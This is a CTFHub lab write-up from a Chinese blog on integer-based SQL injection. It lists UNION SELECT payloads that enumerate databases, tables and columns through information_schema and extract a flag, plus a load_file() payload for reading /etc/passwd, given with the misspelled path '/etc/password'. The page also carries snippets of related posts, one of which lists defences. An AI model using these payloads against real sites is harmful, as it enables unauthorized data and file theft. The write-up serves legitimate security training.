CTFHUB-技能树-Web题-SQL注入-整数型注入

已于 2024-05-09 21:15:21 修改
阅读量395 收藏 8
点赞数 11
分类专栏: CTFHUB解题思路 文章标签: sql 数据库
于 2024-03-28 19:32:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137121734
版权

技能树-Web题-SQL注入-整数型注入

文章目录

SQL注入

数据库知识点

column_name:列的名称

Information_schema.columns:表示所有的列的信息

Information_schema:表示所有信息,包括库、表、列

Information_schema.tables:表示所有的表的信息

table_schema:数据库的名称

table_name:表的名称

整数型注入
判断是否存在注入
输入1 and 1=1 有回显

在这里插入图片描述

1 and 1=2 无回显

在这里插入图片描述

由此判断存在注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

由此判断存在两个字段

判断回显字段
-1 union select 1,2

在这里插入图片描述

1,2又有数值,说明两字段都有回显

爆库名
常用函数
user()
database()
session_usr()
@@version
@@basedir
@@datadir
@@version_compile_os

-1 union select user(),database()

在这里插入图片描述

爆表名

利用 group_concat() 函数进行查询连接所有的表名

-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name='flag'

在这里插入图片描述

爆数据
-1 union select 1,flag from flag

在这里插入图片描述

还可以读取到 /etc/passwd 文件

Linux 读取重要的文件

load_file( )函数 读文件操作

前提

  • 知道文件绝对路径
  • 能够使用union查询
  • 对web目录有写权限
-1 union select 1,load_file('/etc/password')
python炒粉
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 1317
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
CTFHub-技能-Web-SQL注入-整数型注入
m0_62504956的博客
02-19 416
1.查询database数据库 2.查询库中的表 3.查询表中的字段 5.确定flag
CTFHUB-技能-WEB-SQL注入
慢就是快
04-16 297
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
CTFHUB-技能-Web-SQL注入-报错注入
Static______的博客
04-01 587
updatexml(1,2,3)第一个参数是string格式,为xml文档对象的名称,第二个参数为xpath格式的字符串,第三个string格式,替换查找到的符合条件的数据,由于第二个参数要xpath格式的字符串,因为不符合规则所以报错。时间类型的盲注,无法根据页面返还的信息判断任何信息,利用线程返还sleep(x)的时间,来判断对错的注入。布尔类型的盲注,根据返回的页面的是或否,来判断对错的注入。第三个参数:可以输入1,替换查找的符合条件的参数。第一个参数:可以输入1,为XML文档对象的名称。
CTFHub技能 Web-SQL注入详解
千寻的博客
11-21 1872
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHub-Web-SQL注入-整数型注入
weixin_56301399的博客
06-26 288
sql注入之整型注入
ctfhub技能web--sql注入
m0_64636395的博客
05-15 741
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
解记录-CTFHub技能|Web|SQL注入
weixin_57448435的博客
09-14 2113
数据库注入
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 478
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
lxcw_sir的博客
05-29 399
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL的锁介绍
最新发布
lee_vincent1的博客
06-02 361
PostgreSQL 中的锁机制是一种用于控制数据并发访问的手段,确保数据库的完整性和一致性。在实际应用中,合理使用锁可以避免数据不一致和减少死锁的发生。
postgressql——Tuple学习(2)
Re_view的博客
05-27 351
postgressql——Tuple学习(2)
PostgreSQL启动报错“could not map anonymous shared memory: Cannot allocate memory”
lee_vincent1的博客
06-02 319
PostgreSQL 请求的共享内存段超出了当前可用的内存、交换空间或大页内存 (huge pages)。当前请求的内存大小为 295,698,432 字节(约 282 MB)。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值